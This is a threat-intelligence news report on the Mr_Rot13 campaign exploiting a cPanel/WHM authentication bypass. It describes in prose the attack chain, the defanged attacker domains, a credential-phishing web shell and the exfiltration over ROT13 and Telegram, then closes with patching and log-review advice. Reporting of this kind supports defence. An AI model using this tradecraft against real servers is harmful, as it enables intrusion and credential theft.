Mr_Rot13 exploits cPanel flaw to deploy Filemanager backdoor
Mr_Rot13 is exploiting cPanel CVE-2026-41940 to install a Filemanager backdoor, add SSH keys, deploy PHP web shells and exfiltrate credentials and server data.
QiAnXin XLab reported that a threat actor known as Mr_Rot13 is exploiting CVE-2026-41940 in cPanel and WebHost Manager (WHM) to deploy a backdoor called Filemanager. The exploitation began shortly after the vulnerability was publicly disclosed late last month and has been observed at scale.
The flaw permits an authentication bypass that allows remote attackers to gain elevated control of the control panel. Attackers are running automated scans and using shell scripts fetched via wget or curl to download a Go-based infector from attacker-controlled domains, including wpsock[.]com and cp.dene[.]de.
The Go infector implants an attacker-controlled SSH public key to maintain persistent access and drops a PHP web shell that supports file upload, download and remote command execution. The web shell injects JavaScript that serves a fake cPanel login page to capture credentials. Stolen credentials are encoded with the ROT13 cipher and sent to wrned[.]com.
The infection chain culminates with deployment of Filemanager, a cross-platform backdoor that runs on Windows, macOS and Linux and provides file management, remote command execution and shell access. In the sample analyzed by researchers, Filemanager was delivered via a shell script downloaded from wpsock[.]com.
The infector also gathers local data, including bash history, SSH data, device information, database passwords and cPanel virtual aliases (valiases). Collected data is forwarded to a three-member Telegram group operated by a user named “0xWR”.
QiAnXin XLab reported: “Monitoring data shows that more than 2,000 attacker source IPs worldwide are currently involved in automated attacks and cybercrime activities targeting this vulnerability.” The source IPs are distributed globally and primarily originate from Germany, the United States, Brazil and the Netherlands. Researchers noted that the command-and-control domain embedded in the injected JavaScript was first registered in October 2020 and appeared in a PHP backdoor sample uploaded in April 2022, and that related samples and infrastructure have had a low detection rate over several years.
Researchers observed follow-on activity on compromised servers, including cryptocurrency mining, ransomware deployment and botnet propagation. The campaign uses a multi-stage downloader, ROT13 encoding for exfiltration endpoints and Telegram channels for data collection.
Organizations running cPanel and WHM are advised to apply vendor patches and mitigations. Administrators should review access logs for suspicious activity, rotate compromised credentials and inspect cPanel accounts and file systems for unexpected SSH keys, web shells or unfamiliar scheduled tasks.
